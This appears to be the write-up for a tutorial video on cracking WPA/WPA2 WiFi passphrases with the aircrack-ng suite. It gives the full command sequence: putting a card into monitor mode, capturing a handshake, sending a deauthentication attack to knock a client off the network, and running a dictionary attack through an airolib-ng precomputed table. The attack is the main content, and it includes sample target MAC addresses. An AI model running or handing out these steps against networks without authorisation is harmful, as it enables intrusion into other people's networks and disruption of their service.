[Video] Cracking WiFi - WPA/WPA2 with Hidden SSID (aircrack-ng + airolib-ng)
Watch on-line: http://g0tmi1k.blip.tv/file/2318855
What is this?
How to crack a wireless network using WPA/WPA2 (PSK/AES) encryption with a connected client (as both have same method!) . Then using a pre-computed hash table which has been "pre-salted" with the ESSID for the network to get the pass-phrase.
How does this work?
> Captures a 4-way handshake
> Creates a quick DoS (Denial of Service) attack at connected client to force them to disconnect and reconnect
> Apply a brute force dictionary attack to the handshake
What do I need?
> Aircrack-ng suite
> WiFi card that supports monitor mode
> Big dictionary
> Processing power
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gzCommands:
airmon-ng start wlan0
airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0
aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0
airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst
airolib-ng crackwpa --import essid ~/essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack-ng -r crackwpa output*.cap
This is cut from my final video called "g0tmi1k's home network".
There HAS to be a CONNECT client.
The pass-phrase HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing!
Song: Sub Focus - Rock It
Video length: 03:53
Capture length: 04:03
Forum Post: http://www.backtrack-linux.org/forum...irolib-ng.html